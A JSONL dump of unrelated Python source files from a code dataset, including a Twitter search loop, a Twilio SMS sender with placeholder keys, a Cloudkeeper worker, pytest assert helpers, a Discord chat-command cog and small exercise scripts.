key_flag)\n\n\nif __name__ == '__main__':\n key_flag = 0 # =1 When the key_list is 4 lines or it is a wrong key.\n print(key_num)\n # search test\n q = \"Donald Trump\"\n # q = \"#皮肉\"\n while True:\n try:\n search_tweets(q, key_flag)\n except Exception as e:\n with open(\"../log.txt\", \"a\") as f_log:\n f_log.write(\n \"[{0}]Error! {1}\\n\".format(\n time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime()), e))\n sys.exit()\n time.sleep(15 * 60)\n sys.exit()\n","sub_path":"tweetsearchintest.py","file_name":"tweetsearchintest.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604389391","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 26 03:34:28 2018\n\n@author: kevinschenthal\n\nRepeated String\n\"\"\"\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the repeatedString function below.\ndef repeatedString(s, n):\n n_as_in_s = len([x for x in s if x == 'a'])\n n_a_whole = int(n / len(s)) * n_as_in_s\n len_remainder = n % len(s)\n num_a_remainder = len([x for x in s[:len_remainder] if x == 'a'])\n return n_a_whole + num_a_remainder\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n n = int(input())\n\n result = repeatedString(s, n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n\n","sub_path":"repeatedString.py","file_name":"repeatedString.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"458218864","text":"from twilio.rest import Client\n\n#these are the MSA keys\naccount_sid = \"A\"\nauth_token = \"B\"\n\nclient = Client(account_sid, auth_token)\n\nmsa_numbers = [\"ABC\"]#insert the list of numbers\n\nfor i in range(len(msa_numbers)):# for loop\n\tmessage = client.messages.create(to=msa_numbers[i], from_=\"+16123248644\",\n body=\"Morning. this is a test message. 
wake up\")\n","sub_path":"msa_twilio.py","file_name":"msa_twilio.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"550250561","text":"from functools import partial\nimport time\nimport os\nimport threading\nimport cklib.signal\nfrom typing import List, Dict\nfrom cklib.logging import log, add_args as logging_add_args\nfrom cklib.graph import add_args as graph_add_args\nfrom cklib.jwt import add_args as jwt_add_args\nfrom cklib.pluginloader import PluginLoader\nfrom cklib.baseplugin import BaseCollectorPlugin, PluginType\nfrom cklib.web import WebServer\nfrom cklib.web.metrics import WebApp\nfrom cklib.utils import log_stats, increase_limits\nfrom cklib.args import ArgumentParser\nfrom cklib.core.actions import CoreActions\nfrom cklib.core.tasks import CoreTasks\nfrom ckworker.collect import collect, add_args as collect_add_args\nfrom ckworker.cleanup import cleanup, add_args as cleanup_add_args\nfrom ckworker.ckcore import add_args as ckcore_add_args\nfrom ckworker.tag import core_tag_tasks_processor\nfrom cklib.event import (\n add_event_listener,\n Event,\n EventType,\n add_args as event_add_args,\n)\n\n\n# This will be used in main() and shutdown()\nshutdown_event = threading.Event()\ncollect_event = threading.Event()\n\n\ndef main() -> None:\n # Try to run in a new process group and\n # ignore if not possible for whatever reason\n try:\n os.setpgid(0, 0)\n except Exception:\n pass\n\n cklib.signal.parent_pid = os.getpid()\n\n # Add cli args\n # The following double parsing of cli args is done so that when\n # a user specifies e.g. `--collector aws --help` they would\n # no longer be shown cli args for other collectors like gcp.\n collector_arg_parser = ArgumentParser(\n description=\"Cloudkeeper Worker\",\n env_args_prefix=\"CKWORKER_\",\n add_help=False,\n add_machine_help=False,\n )\n PluginLoader.add_args(collector_arg_parser)\n (args, _) = collector_arg_parser.parse_known_args()\n ArgumentParser.args = args\n\n arg_parser = ArgumentParser(\n description=\"Cloudkeeper Worker\",\n env_args_prefix=\"CKWORKER_\",\n )\n jwt_add_args(arg_parser)\n logging_add_args(arg_parser)\n graph_add_args(arg_parser)\n collect_add_args(arg_parser)\n cleanup_add_args(arg_parser)\n ckcore_add_args(arg_parser)\n WebApp.add_args(arg_parser)\n PluginLoader.add_args(arg_parser)\n event_add_args(arg_parser)\n add_args(arg_parser)\n\n # Find cloudkeeper Plugins in the cloudkeeper.plugins module\n plugin_loader = PluginLoader(PluginType.COLLECTOR)\n plugin_loader.add_plugin_args(arg_parser)\n\n # At this point the CLI, all Plugins as well as the WebServer have\n # added their args to the arg parser\n arg_parser.parse_args()\n\n # Handle Ctrl+c and other means of termination/shutdown\n cklib.signal.initializer()\n add_event_listener(EventType.SHUTDOWN, shutdown, blocking=False)\n\n # Try to increase nofile and nproc limits\n increase_limits()\n\n web_server = WebServer(WebApp())\n web_server.daemon = True\n web_server.start()\n\n core_actions = CoreActions(\n identifier=\"workerd-actions\",\n ckcore_uri=ArgumentParser.args.ckcore_uri,\n ckcore_ws_uri=ArgumentParser.args.ckcore_ws_uri,\n actions={\n \"collect\": {\n \"timeout\": ArgumentParser.args.timeout,\n \"wait_for_completion\": True,\n },\n \"cleanup\": {\n \"timeout\": ArgumentParser.args.timeout,\n \"wait_for_completion\": True,\n },\n },\n message_processor=partial(\n core_actions_processor, plugin_loader.plugins(PluginType.COLLECTOR)\n ),\n )\n\n 
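    # Editor's sketch (hedged): shape of the reply dict that
    # core_actions_processor returns for a successful action, mirroring the
    # dict literally built at the end of that function; values shown here are
    # illustrative only:
    #   {"kind": "action_done",      # or "action_error" if the handler raised
    #    "message_type": "collect",  # or "cleanup"
    #    "data": data}               # echoed back from the incoming message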
task_queue_filter = {}\n if ArgumentParser.args.collector and len(ArgumentParser.args.collector) > 0:\n task_queue_filter = {\"cloud\": list(ArgumentParser.args.collector)}\n core_tasks = CoreTasks(\n identifier=\"workerd-tasks\",\n ckcore_ws_uri=ArgumentParser.args.ckcore_ws_uri,\n tasks=[\"tag\"],\n task_queue_filter=task_queue_filter,\n message_processor=core_tag_tasks_processor,\n )\n core_actions.start()\n core_tasks.start()\n\n # We wait for the shutdown Event to be set() and then end the program\n # While doing so we print the list of active threads once per 15 minutes\n shutdown_event.wait()\n web_server.shutdown()\n time.sleep(1) # everything gets 1000ms to shutdown gracefully before we force it\n cklib.signal.kill_children(cklib.signal.SIGTERM, ensure_death=True)\n log.info(\"Shutdown complete\")\n os._exit(0)\n\n\ndef core_actions_processor(\n collectors: List[BaseCollectorPlugin], message: Dict\n) -> None:\n if not isinstance(message, dict):\n log.error(f\"Invalid message: {message}\")\n return\n kind = message.get(\"kind\")\n message_type = message.get(\"message_type\")\n data = message.get(\"data\")\n log.debug(f\"Received message of kind {kind}, type {message_type}, data: {data}\")\n if kind == \"action\":\n try:\n if message_type == \"collect\":\n start_time = time.time()\n collect(collectors)\n run_time = int(time.time() - start_time)\n log.debug(f\"Collect ran for {run_time} seconds\")\n elif message_type == \"cleanup\":\n start_time = time.time()\n cleanup()\n run_time = int(time.time() - start_time)\n log.debug(f\"Cleanup ran for {run_time} seconds\")\n else:\n raise ValueError(f\"Unknown message type {message_type}\")\n except Exception as e:\n log.exception(f\"Failed to {message_type}: {e}\")\n reply_kind = \"action_error\"\n else:\n reply_kind = \"action_done\"\n\n reply_message = {\n \"kind\": reply_kind,\n \"message_type\": message_type,\n \"data\": data,\n }\n return reply_message\n\n\ndef add_args(arg_parser: ArgumentParser) -> None:\n arg_parser.add_argument(\n \"--timeout\",\n help=\"Collection/cleanup Timeout in seconds (default: 10800)\",\n default=10800,\n dest=\"timeout\",\n type=int,\n )\n arg_parser.add_argument(\n \"--web-port\",\n help=\"Web Port (default 9955)\",\n default=9956,\n dest=\"web_port\",\n type=int,\n )\n arg_parser.add_argument(\n \"--web-host\",\n help=\"IP to bind to (default: ::)\",\n default=\"::\",\n dest=\"web_host\",\n type=str,\n )\n\n\ndef shutdown(event: Event) -> None:\n reason = event.data.get(\"reason\")\n emergency = event.data.get(\"emergency\")\n\n if emergency:\n cklib.signal.emergency_shutdown(reason)\n\n current_pid = os.getpid()\n if current_pid != cklib.signal.parent_pid:\n return\n\n if reason is None:\n reason = \"unknown reason\"\n log.info(\n (\n f\"Received shut down event {event.event_type}:\"\n f\" {reason} - killing all threads and child processes\"\n )\n )\n shutdown_event.set() # and then end the program\n\n\ndef force_shutdown(delay: int = 10) -> None:\n time.sleep(delay)\n log_stats()\n log.error(\n (\n \"Some child process or thread timed out during shutdown\"\n \" - forcing shutdown completion\"\n )\n )\n os._exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ckworker/ckworker/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"262191643","text":"\"\"\"\nCopyright 2016 Oliver Schoenborn. 
BSD 3-Clause license (see __license__ at bottom of this file for details).\n\nThis module is part of the nose2pytest distribution.\n\nThis module's assert_ functions provide drop-in replacements for nose.tools.assert_ functions (many of which are\npep-8-ized extractions from Python's unittest.case.TestCase methods). As such, it can be imported in a test\nsuite run by py.test, to replace the nose imports with functions that rely on py.test's assertion\nintrospection for error reporting. When combined with running nose2pytest.py on your test suite, this\nmodule may be sufficient to decrease your test suite's third-party dependencies by 1.\n\"\"\"\n\nimport unittest\n\n\n__all__ = [\n 'assert_almost_equal',\n 'assert_not_almost_equal',\n 'assert_dict_contains_subset',\n\n 'assert_raises_regex',\n 'assert_raises_regexp',\n 'assert_regexp_matches',\n 'assert_warns_regex',\n]\n\n\ndef assert_almost_equal(a, b, places=7, msg=None):\n \"\"\"\n Fail if the two objects are unequal as determined by their\n difference rounded to the given number of decimal places\n and comparing to zero.\n\n Note that decimal places (from zero) are usually not the same\n as significant digits (measured from the most signficant digit).\n\n See the builtin round() function for places parameter.\n \"\"\"\n if msg is None:\n assert round(abs(b - a), places) == 0\n else:\n assert round(abs(b - a), places) == 0, msg\n\n\ndef assert_not_almost_equal(a, b, places=7, msg=None):\n \"\"\"\n Fail if the two objects are equal as determined by their\n difference rounded to the given number of decimal places\n and comparing to zero.\n\n Note that decimal places (from zero) are usually not the same\n as significant digits (measured from the most signficant digit).\n\n See the builtin round() function for places parameter.\n \"\"\"\n if msg is None:\n assert round(abs(b - a), places) != 0\n else:\n assert round(abs(b - a), places) != 0, msg\n\n\ndef assert_dict_contains_subset(subset, dictionary, msg=None):\n \"\"\"\n Checks whether dictionary is a superset of subset. 
If not, the assertion message will have useful details,\n    unless msg is given, then msg is output.\n    \"\"\"\n    missing_keys = sorted(list(set(subset.keys()) - set(dictionary.keys())))\n    mismatch_vals = {k: (subset[k], dictionary[k]) for k in subset if k in dictionary and subset[k] != dictionary[k]}\n    if msg is None:\n        assert missing_keys == [], 'Missing keys = {}'.format(missing_keys)\n        assert mismatch_vals == {}, 'Mismatched values (s, d) = {}'.format(mismatch_vals)\n    else:\n        assert missing_keys == [], msg\n        assert mismatch_vals == {}, msg\n\n\n# make other unittest.TestCase methods available as-is as functions; trick taken from Nose\n\nclass _Dummy(unittest.TestCase):\n    def do_nothing(self):\n        pass\n\n_t = _Dummy('do_nothing')\n\n# plain assignments, not tuples: a trailing comma on any of these lines would\n# wrap the bound method in a 1-tuple and make the exported name uncallable\nassert_raises_regex = _t.assertRaisesRegex\nassert_raises_regexp = _t.assertRaisesRegexp\nassert_regexp_matches = _t.assertRegexpMatches\nassert_warns_regex = _t.assertWarnsRegex\n\ndel _Dummy\ndel _t\n\n\n# py.test integration: add all assert_ functions to the pytest package namespace\n\n# Use similar trick as Nose to bring in bound methods from unittest.TestCase as free functions:\n\ndef pytest_namespace() -> {str: callable}:\n    namespace = {}\n    for name, obj in globals().items():\n        if name.startswith('assert_'):\n            namespace[name] = obj\n\n    return namespace\n\n\n# licensing\n\n__license__ = \"\"\"\n    Copyright (c) 2016, Oliver Schoenborn\n    All rights reserved.\n\n    Redistribution and use in source and binary forms, with or without\n    modification, are permitted provided that the following conditions are met:\n\n    * Redistributions of source code must retain the above copyright notice, this\n      list of conditions and the following disclaimer.\n\n    * Redistributions in binary form must reproduce the above copyright notice,\n      this list of conditions and the following disclaimer in the documentation\n      and/or other materials provided with the distribution.\n\n    * Neither the name of nose2pytest nor the names of its\n      contributors may be used to endorse or promote products derived from\n      this software without specific prior written permission.\n\n    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n    DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n","sub_path":"plugins/assert_tools.py","file_name":"assert_tools.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"304074227","text":"from saqws import SAQSubClient\nfrom clienthandler import ClientHandler\nimport aiohttp\nimport aiohttp.web\nimport asyncio\nimport logging\nimport os\nimport platform\n\n\nlogger = logging.getLogger(__name__)\n# SERVER_HOST = 'localhost'\n# SERVER_PORT = 9876\nSERVER_HOST = 'saqtestbe.appspot.com'\nSERVER_PORT = None\nvalue = None\n\n\nasync def app_entrypoint():\n global data\n\n app = aiohttp.web.Application()\n app.router.add_get(\"/\", root_handler)\n\n # handle websocket clients\n ClientHandler.add_route(app, '/ws')\n\n # setup listener\n queue = asyncio.Queue()\n sub_client = SAQSubClient(data_buffer=queue, formatter=lambda x: x)\n sub_client.connect(scheme='http', host=SERVER_HOST, port=SERVER_PORT, path='/saqws')\n\n loop = asyncio.get_event_loop()\n loop.create_task(broker_distributing(queue))\n return app\n\n\nasync def root_handler(request):\n info = {\n \"file\": __file__,\n \"os\": os.name,\n \"python-version\": platform.python_version()\n }\n return aiohttp.web.json_response(info)\n\n\nasync def broker_distributing(queue: asyncio.Queue):\n global value\n\n while True:\n value = await queue.get()\n ClientHandler.update_value(value)\n\n\nasync def main(host, port):\n app = await app_entrypoint()\n runner = aiohttp.web.AppRunner(app)\n await runner.setup()\n site = aiohttp.web.TCPSite(runner=runner, host=host, port=port, ssl_context=None)\n await site.start()\n\n while True:\n await asyncio.sleep(1)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n\n host = 'localhost'\n port = 9877\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(host, port))","sub_path":"sessionawarequeue/broker/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"347572430","text":"# frase = 'CURSO EM VIDEO PYTHON'.split()\n# frase = ''.join(frase)\n# print(frase[len(frase)::-1]) # frase ao contrario\n# n = int(input('Digite um número para saber seu fatorial: '))\n# cont = n\n# fac = 1\n# while cont > 0:\n# print(cont, end=' ')\n# print('x ' if cont > 1 else '= ', end='')\n# fac = fac * 5\n# cont -= 1\n# print(f'{fac}')\n# n = int(input('Digite um número: '))\n# f = 1\n# for c in range(n, 0, -1):\n# f *= c\n# print(f'{c}', end='')\n# print(' x ' if c > 1 else ' = ', end='')\n# print(f'{f}', end='')\n\n# n = int(input('Quantos termos quer mostrar? 
'))\n# t1 = 0\n# t2 = 1\n# cont = 3\n# print('0 → 1', end='')\n# while cont <= n:\n# t3 = t2 + t1\n# print(f' → {t3}', end='')\n# cont += 1\n# t1 = t2\n# t2 = t3\n# print('FIM', end='')\n\ntot_idade = man = woman = idade_woman = idade = 0\nsexo = ' '\nprint('#' * 40)\nprint(f'{\"CADASTRO DE PESSOAS\":^40}')\nprint('#' * 40)\nwhile True:\n idade_str = str(input('Digite sua idade: '))\n while idade_str.isnumeric() is not True:\n idade_str = str(input('Dados inválidos, tente novamente: Digite sua idade: '))\n idade = int(idade_str)\n sexo_t = ' '\n while sexo_t.isalpha() is not True:\n sexo_t = str(input('Sexo [M/F]: ')).upper()\n while sexo_t != 'M' and sexo_t != 'F':\n sexo_t = str(input('Dados Incorretos, tente de novo: Sexo [M/F]: ')).upper()\n sexo = str(sexo_t).upper()\n if sexo == 'M':\n man += 1\n elif sexo == 'F':\n woman += 1\n if idade < 20:\n idade_woman += 1\n if idade >= 18:\n tot_idade += 1\n print('-' * 40)\n stop = ' '\n while stop.isalpha() is not True:\n stop = str(input('Quer continuar? [S/N]: ')).upper()\n while stop != 'S' and stop != 'N':\n stop = str(input('Erro na digitação, tente novamente: Quer continuar? [S/N]: ')).upper()\n print('-' * 40)\n if stop == 'S':\n print('=' * 40)\n print('CADASTRE UMA NOVA PESSOA!')\n print('=' * 40)\n elif stop == 'N':\n break\nprint('=' * 40)\nprint('Cadastro Finalizado Com Sucesso!')\nprint('=' * 40)\nprint(f'Todal de pessoas com mais de 18 anos = {tot_idade}')\nprint(f'Homens cadastrados = {man}')\nprint(f'Mulheres cadastradas = {woman}')\nprint(f'Mulheres com menos de 20 anos = {idade_woman}')\n","sub_path":"testtee.py","file_name":"testtee.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"110988003","text":"\"\"\"\nTests for the dispatcher code\n\"\"\"\nfrom .dispatcher import Dispatcher\nfrom .protocol import ConnectionLost\nfrom nose.tools import assert_equals\n\nclass DoubleWorker(object):\n \"\"\"\n This object implements the worker interface, but just concatenates the task\n with itself\n \"\"\"\n def __init__(self):\n self.calls = 0\n\n def do_task(self, configuration_id, task):\n \"\"\"\n Do a silly implementation of a task\n \"\"\"\n self.calls += 1\n return task + task\n\nclass GiveUpWorker(object):\n \"\"\"\n Implements the Worker interface by giving up every time\n \"\"\"\n\n def do_task(self, configuration_id, task):\n \"\"\"\n This raises ConnectionLost which indicates that the worker cannot \n perform tasks for some reason\n \"\"\"\n raise ConnectionLost()\n\ndef test_dispatcher():\n \"\"\"\n Make sure that the tasks do get done\n \"\"\"\n dispatcher = Dispatcher()\n dispatcher.add_worker(DoubleWorker(), 1)\n event = dispatcher.do_task(None, 'yellow')\n assert_equals( 'yellowyellow', event.wait() )\n\ndef test_dispatcher_early():\n \"\"\"\n Make sure that requesting a task before adding a worker is ok\n \"\"\"\n dispatcher = Dispatcher()\n event = dispatcher.do_task(None, 'yellow')\n dispatcher.add_worker(DoubleWorker(), 1)\n assert_equals( 'yellowyellow', event.wait() )\n\ndef test_two_workers():\n \"\"\"\n Ensure that a worker requesting double tasks gets them\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 2)\n dispatcher.add_worker(DoubleWorker(), 2)\n for x in range(2):\n dispatcher.do_task(None, '').wait()\n\n assert_equals( worker.calls, 2)\n\n\ndef test_repeat_workers():\n \"\"\"\n Make sure that workers are recycled once they are finished\n \"\"\"\n dispatcher = 
Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 1)\n for x in range(10):\n dispatcher.do_task(None, '').wait()\n\ndef test_disabled_workers():\n \"\"\"\n Make sure that workers who refused to work don't stop us\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 1)\n dispatcher.add_worker(GiveUpWorker(), 1)\n for x in range(10):\n assert_equals('', dispatcher.do_task(None, '').wait() )\n\ndef test_disabled_workers_multiple():\n \"\"\"\n Make sure a double active worker who refuses to work doesn't cause a problem\n \"\"\"\n dispatcher = Dispatcher()\n worker = DoubleWorker()\n dispatcher.add_worker(worker, 1)\n dispatcher.add_worker(GiveUpWorker(), 2)\n tasks = [dispatcher.do_task(None, '') for x in range(10)]\n for task in tasks:\n assert_equals('', task.wait() )\n","sub_path":"pymultinode/test_dispatcher.py","file_name":"test_dispatcher.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34464271","text":"import pika\n\nfrom innovapos.worker.app_worker import worker\nfrom innovapos.worker.clients import BlockingAMQPClient\nfrom innovapos.worker.worker import WorkerStates\n\n\n@worker.ws_message_handler(\"debug.states.get\", [WorkerStates.ANY])\ndef states_change(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Devuelve el estado actual \n \"\"\"\n client.send_message(f\"Current state is {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.states.change\", [WorkerStates.ANY])\ndef states_change(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Actualiza el estado actual al estado proporcionado en el body\n \"\"\"\n message = message.upper()\n if message not in WorkerStates.__dict__:\n client.send_message(\"Not a valid enum\")\n return\n old_state = worker.current_state\n worker.current_state = WorkerStates[message]\n client.send_message(f\"State changed from {old_state} to {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.states.simple_any\", [WorkerStates.ANY])\ndef states_any(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Llamada de prueba para ANY\n \"\"\"\n client.send_message(f\"You called DEBUG.STATES.SIMPLE_ANY. Current state is {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.states.debugging_pass\", [WorkerStates.DEBUGGING])\ndef states_fail(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Llamada con filtrado de prueba\n \"\"\"\n client.send_message(f\"Current state is {worker.current_state}\")\n\n\n# @worker.ws_message_handler(\"debug.states.valid_state_definition\") -> falla. 
valid_states no esta definido\n# @worker.ws_message_handler(\"debug.states.valid_state_definition\", []) -> falla, valid_states esta vacio\n@worker.ws_message_handler(\"debug.states.valid_state_definition\", [WorkerStates.NONE])\ndef states_fail(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Ejemplo de definicion correcta de handler de mensajes\n \"\"\"\n # unreachable code, no state defined\n client.send_message(f\"Current state is {worker.current_state}\")\n\n\n@worker.ws_message_handler(\"debug.multihandler_ping\", [WorkerStates.ANY])\n@worker.gateway_message_handler(\"debug.multihandler_ping\", [WorkerStates.ANY])\n@worker.app_message_handler(\"debug.multihandler_ping\", [WorkerStates.ANY])\ndef multihandler_ping(client: BlockingAMQPClient, props: pika.spec.BasicProperties, message: str) -> None:\n \"\"\"\n Ejemplo de definicion correcta de handler de mensajes\n \"\"\"\n # unreachable code, no state defined\n client.send_message(\"PONG\")\n","sub_path":"src/innovapos/worker/tasks/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"193801168","text":"import random\r\n\r\nlen_scale_pattern = int(input(\"length of scale pattern\"))\r\nnumber_of_octaves = int(input(\"number of octaves\")) \r\ntotal_number_of_notes = len_scale_pattern * number_of_octaves\r\n\r\ndef get_all_factors(n):\r\n factors = []\r\n for i in range(2,n+1):\r\n if n%i == 0:\r\n factors.append(i)\r\n return factors\r\n\r\nlist_of_factors = get_all_factors(total_number_of_notes)\r\nnumber_of_notes_in_rhythm = random.choice(list_of_factors)\r\n\r\nbeats_in_measure = random.choice([3, 4, 5]) # this may be expanded\r\nsubdivision = random.choice([3, 4, 5]) # this may be expanded\r\nsubdivisions_available = subdivision * beats_in_measure \r\n\r\nn = number_of_notes_in_rhythm\r\nrhythm_pattern = []\r\n\r\nwhile n > 0:\r\n rhythm = random.randint(1, subdivisions_available-n)\r\n rhythm_pattern.append(rhythm)\r\n subdivisions_available = subdivisions_available - rhythm\r\n n = n - 1\r\nrhythm = subdivisions_available\r\nrhythm_pattern.append(rhythm)\r\n \r\nprint (rhythm_pattern)\r\n\r\n","sub_path":"rhythm.py","file_name":"rhythm.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"279091548","text":"import discord\r\nfrom discord.ext import commands\r\nimport modules.Functions as bot\r\n\r\nlocalesign = 'RU'\r\n\r\n# Getting locale text for replies\r\nDBtext = bot.load_locale('ChatCommands')\r\n\r\nclass ChatCommands:\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n # --------------- Command for clearing chat ---------------\r\n\r\n @commands.command(pass_context=True, aliases=['clr'])\r\n async def clear(self, ctx, amount='1'):\r\n if ctx.message.channel.is_private is True:\r\n return\r\n try:\r\n int(amount)\r\n except ValueError:\r\n await self.client.delete_message(ctx.message)\r\n msg = await self.client.say(DBtext[1])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n amount = int(amount)\r\n if ctx.message.author.server_permissions.manage_messages is True:\r\n if 0 < amount < 100:\r\n channel = ctx.message.channel\r\n messages = []\r\n async for message in self.client.logs_from(channel, limit=amount+1):\r\n messages.append(message)\r\n try:\r\n await self.client.delete_messages(messages)\r\n except 
Exception as error:\r\n msg = await self.client.say(DBtext[2] + ' ' + str(error))\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n msg = await self.client.say(DBtext[3].format(len(messages)-1))\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n else:\r\n await self.client.delete_message(ctx.message)\r\n msg = await self.client.say(DBtext[4])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n else:\r\n msg = await self.client.say(DBtext[5])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n\r\n # --------------- Command for quoting messages ---------------\r\n\r\n @commands.command(pass_context=True, aliases=['qt','move','mv'])\r\n async def quote(self, ctx):\r\n if ctx.message.channel.is_private is True:\r\n return\r\n await self.client.delete_message(ctx.message)\r\n\r\n try:\r\n chnlID, msgID = ctx.message.content.split()[1:] # Getting channel and message ID of source message\r\n except Exception:\r\n msg = await self.client.say(DBtext[6])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n chnlID = bot.clear_channel_ID(chnlID) # Clearing channel ID from mention\r\n chnl_from = self.client.get_channel(chnlID)\r\n if chnl_from is None:\r\n msg = await self.client.say(DBtext[7])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n try:\r\n msg = await self.client.get_message(chnl_from, msgID)\r\n except discord.NotFound:\r\n msg = await self.client.say(DBtext[8])\r\n await bot.clear_last_selfmessage(self.client, msg, msg.channel)\r\n return\r\n mvembed = discord.Embed(\r\n description = msg.content,\r\n timestamp = msg.timestamp,\r\n color = discord.Color.blue()\r\n )\r\n mvembed.set_footer(text='#'+chnl_from.name)\r\n mvembed.set_author(name=msg.author.name, icon_url=msg.author.avatar_url)\r\n # Getting attachment url if exist\r\n if msg.attachments != []:\r\n attch = msg.attachments.pop().get('url')\r\n mvembed.set_image(url=attch)\r\n\r\n await self.client.say(embed=mvembed)\r\n\r\n # --------------- Event for making embedded messages ---------------\r\n\r\n async def on_message(self, message):\r\n if (message.author == self.client.user) or (message.channel.is_private is True):\r\n return\r\n\r\n if message.content.startswith('>>'):\r\n await self.client.delete_message(message)\r\n if message.author.color == discord.Color(0x000000):\r\n clr = discord.Color.light_grey()\r\n else:\r\n clr = message.author.color\r\n embed = await bot.newembed(self.client, user_id=message.author.id, content=message.content[2:], color=clr)\r\n await self.client.send_message(message.channel, embed=embed)\r\n\r\ndef setup(client):\r\n client.add_cog(ChatCommands(client))\r\n","sub_path":"modules/ChatCommands.py","file_name":"ChatCommands.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"315942208","text":"#Asci numaralarına gore harfleri buyukten kucuge siralar.\ndef sort_str(s):\n s = list(s)\n print(s)\n arr = []\n secondArr = []\n\n for i in range(len(s)):\n x = ord(s[i])\n arr.append(x)\n arr.sort()\n #print(arr)\n\n for k in range(len(arr)):\n char = chr(arr[k])\n secondArr.append(char)\n print(secondArr)\n\nsort_str(\"hello\")","sub_path":"arrays/convertAsci.py","file_name":"convertAsci.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
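The convertAsci.py record just above sorts a string's characters by hand: each character is pushed through ord() into an integer list, the list is sorted ascending, and chr() maps the codes back to characters. Its Turkish comment ("sorts the letters from largest to smallest by their ASCII numbers") actually promises the reverse of what arr.sort() does. A minimal sketch of the same ascending code-point sort in idiomatic Python; the name sort_str is kept from that record, while the return type and the sample call are illustrative assumptions:

def sort_str(s: str) -> str:
    # sorted() compares characters by code point, so the explicit
    # ord()/chr() round-trip of the original snippet is unnecessary;
    # pass reverse=True to get the descending order the comment describes
    return ''.join(sorted(s))

print(sort_str('hello'))  # ehllo

Returning the joined string rather than printing the intermediate lists also keeps the helper side-effect free and easy to assert against in a test.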
